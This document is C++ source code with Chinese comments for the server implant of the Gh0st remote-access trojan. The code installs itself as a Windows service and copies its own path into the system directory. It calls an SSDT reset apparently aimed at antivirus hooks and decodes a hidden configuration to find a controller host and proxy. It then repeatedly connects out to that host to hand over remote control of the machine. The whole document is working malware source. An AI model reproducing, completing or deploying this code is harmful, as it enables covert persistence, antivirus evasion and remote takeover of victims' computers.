int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { // TODO: Place code here. ////////////////////////////////////////////////////////////////////////// OutputDebugString("%%%%%F**k KV %%%%%F**k KV %%%%%"); CopyFile("%%%%%F**k KV %%%%%F**k KV %%%%%", NULL, false); ////////////////////////////////////////////////////////////////////////// char *lpEncodeString = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // 如果不是更新服务端 if (strstr(GetCommandLine(), "Gh0st Update") == NULL) { HANDLE hMutex = CreateMutex(NULL, true, lpEncodeString); DWORD dwLastError = GetLastError(); // 普通权限访问系统权限创建的Mutex,如果存在,如果存在就返回拒绝访问的错误 // 已经安装过一个一模一样配置的,就不安装了 if (dwLastError == ERROR_ALREADY_EXISTS || dwLastError == ERROR_ACCESS_DENIED) return -1; ReleaseMutex(hMutex); CloseHandle(hMutex); } SetUnhandledExceptionFilter(bad_exception); ResetSSDT(hInstance); char strSelf[MAX_PATH]; memset(strSelf, 0, sizeof(strSelf)); GetModuleFileName(NULL, strSelf, sizeof(strSelf)); char strTempPath[MAX_PATH], strSysLog[MAX_PATH]; GetTempPath(sizeof(strTempPath), strTempPath); GetSystemDirectory(strSysLog, sizeof(strSysLog)); lstrcat(strTempPath, "\\install.tmp"); lstrcat(strSysLog, "\\install.tmp"); HANDLE hFile = CreateFile(strTempPath, GENERIC_ALL, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); DWORD dwBytesWrite = 0; WriteFile(hFile, strSelf, lstrlen(strSelf), &dwBytesWrite, NULL); CloseHandle(hFile); MoveFile(strTempPath, strSysLog); DeleteFile(strTempPath); char *lpServiceName = InstallService(); if (lpServiceName != NULL) { StartService(lpServiceName); delete [] lpServiceName; } return -1; }
DWORD WINAPI main(char *lpServiceName) #endif { #ifdef _CONSOLE if (argc < 3) { printf("Usage:\n %s <Host> <Port>\n", argv[0]); return -1; } #endif // lpServiceName,在ServiceMain返回后就没有了 char strServiceName[256]; char strKillEvent[50]; HANDLE hInstallMutex = NULL; #ifdef _DLL char *lpURL = (char *)FindConfigString(CKeyboardManager::g_hInstance, "AAAAAA"); if (lpURL == NULL) { return -1; } ////////////////////////////////////////////////////////////////////////// // Set Window Station HWINSTA hOldStation = GetProcessWindowStation(); HWINSTA hWinSta = OpenWindowStation("winsta0", FALSE, MAXIMUM_ALLOWED); if (hWinSta != NULL) SetProcessWindowStation(hWinSta); // ////////////////////////////////////////////////////////////////////////// if (CKeyboardManager::g_hInstance != NULL) { SetUnhandledExceptionFilter(bad_exception); ResetSSDT(); lstrcpy(strServiceName, lpServiceName); wsprintf(strKillEvent, "Global\\Gh0st %d", GetTickCount()); // 随机事件名 hInstallMutex = CreateMutex(NULL, true, lpURL); ReConfigService(strServiceName); // 删除安装文件 DeleteInstallFile(lpServiceName); } // http://hi.baidu.com/zxhouse/blog/item/dc651c90fc7a398fa977a484.html #endif // 告诉操作系统:如果没有找到CD/floppy disc,不要弹窗口吓人 SetErrorMode( SEM_FAILCRITICALERRORS); char *lpszHost = NULL; DWORD dwPort = 80; char *lpszProxyHost = NULL; DWORD dwProxyPort = 0; char *lpszProxyUser = NULL; char *lpszProxyPass = NULL; HANDLE hEvent = NULL; CClientSocket socketClient; BYTE bBreakError = NOT_CONNECT; // 断开连接的原因,初始化为还没有连接 while (1) { // 如果不是心跳超时,不用再sleep两分钟 if (bBreakError != NOT_CONNECT && bBreakError != HEARTBEATTIMEOUT_ERROR) { // 2分钟断线重连, 为了尽快响应killevent for (int i = 0; i < 2000; i++) { hEvent = OpenEvent(EVENT_ALL_ACCESS, false, strKillEvent); if (hEvent != NULL) { socketClient.Disconnect(); CloseHandle(hEvent); break; break; } // 改一下 Sleep(60); } } #ifdef _DLL // 上线间隔为2分, 前6个'A'是标志 if (!getLoginInfo(MyDecode(lpURL + 6), &lpszHost, &dwPort, &lpszProxyHost, &dwProxyPort, &lpszProxyUser, &lpszProxyPass)) { bBreakError = GETLOGINFO_ERROR; continue; } #else lpszHost = argv[1]; dwPort = atoi(argv[2]); #endif if (lpszProxyHost != NULL) socketClient.setGlobalProxyOption(PROXY_SOCKS_VER5, lpszProxyHost, dwProxyPort, lpszProxyUser, lpszProxyPass); else socketClient.setGlobalProxyOption(); DWORD dwTickCount = GetTickCount(); if (!socketClient.Connect(lpszHost, dwPort)) { bBreakError = CONNECT_ERROR; continue; } // 登录 DWORD dwExitCode = SOCKET_ERROR; sendLoginInfo(strServiceName, &socketClient, GetTickCount() - dwTickCount); CKernelManager manager(&socketClient, strServiceName, g_dwServiceType, strKillEvent, lpszHost, dwPort); socketClient.setManagerCallBack(&manager); ////////////////////////////////////////////////////////////////////////// // 等待控制端发送激活命令,超时为10秒,重新连接,以防连接错误 for (int i = 0; (i < 10 && !manager.IsActived()); i++) { Sleep(1000); } // 10秒后还没有收到控制端发来的激活命令,说明对方不是控制端,重新连接 if (!manager.IsActived()) continue; ////////////////////////////////////////////////////////////////////////// DWORD dwIOCPEvent; dwTickCount = GetTickCount(); do { hEvent = OpenEvent(EVENT_ALL_ACCESS, false, strKillEvent); dwIOCPEvent = WaitForSingleObject(socketClient.m_hEvent, 100); Sleep(500); } while(hEvent == NULL && dwIOCPEvent != WAIT_OBJECT_0); if (hEvent != NULL) { socketClient.Disconnect(); CloseHandle(hEvent); break; } } #ifdef _DLL ////////////////////////////////////////////////////////////////////////// // Restor WindowStation and Desktop // 不需要恢复卓面,因为如果是更新服务端的话,新服务端先运行,此进程恢复掉了卓面,会产生黑屏 // SetProcessWindowStation(hOldStation); // CloseWindowStation(hWinSta); // ////////////////////////////////////////////////////////////////////////// #endif SetErrorMode(0); ReleaseMutex(hInstallMutex); CloseHandle(hInstallMutex); }